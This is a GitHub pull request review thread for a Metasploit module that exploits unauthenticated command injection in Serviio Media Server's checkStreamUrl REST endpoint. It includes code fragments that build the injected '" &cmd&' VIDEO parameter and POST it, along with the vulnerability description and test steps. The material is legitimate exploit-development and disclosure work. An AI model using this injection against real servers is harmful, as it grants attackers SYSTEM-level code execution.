New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Serviio Media Server checkStreamUrl Command Execution #8347
Add Serviio Media Server checkStreamUrl Command Execution #8347
Conversation
def execute_command(cmd, opts = {}) | ||
json = { 'name' => 'checkStreamUrl', | ||
'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Formatting suggestions.
json = {
'name' => 'checkStreamUrl',
'parameter' => ['VIDEO', "\" &#{cmd}&"]
}.to_json
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No thanks
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.
However the .to_json
call should probably be moved inside the send_request_uri
method. I've fixed this.
'method' => 'POST', | ||
'ctype' => 'application/json', | ||
'data' => json) | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yet another formatting suggestion.
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'rest', 'action'),
'method' => 'POST',
'ctype' => 'application/json',
'data' => json
)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No thanks
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.
end | ||
|
||
def exploit | ||
fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I believe you may want to use Failure::NotVulnerable
instead of Failure::NoTarget
.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fixed
Testing... |
Flawless victory:
|
Release NotesThe exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows). |
This PR adds an exploit module for Serviio Media Server.
This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.
The console service (on port 23423 by default) exposes a REST API which
which does not require authentication.
The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.
This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.
Documentation
To follow; when I feel like it.
Verification
msfconsole
use exploit/windows/http/serviio_checkstreamurl_cmd_exec
check
Unknown
if the connection to the target server fails.Appears
if the target server is Serviio version 1.4 to 1.8 on Windows.Safe
if the target server is not Serviio version 1.4 to 1.8 on Windows.run
Output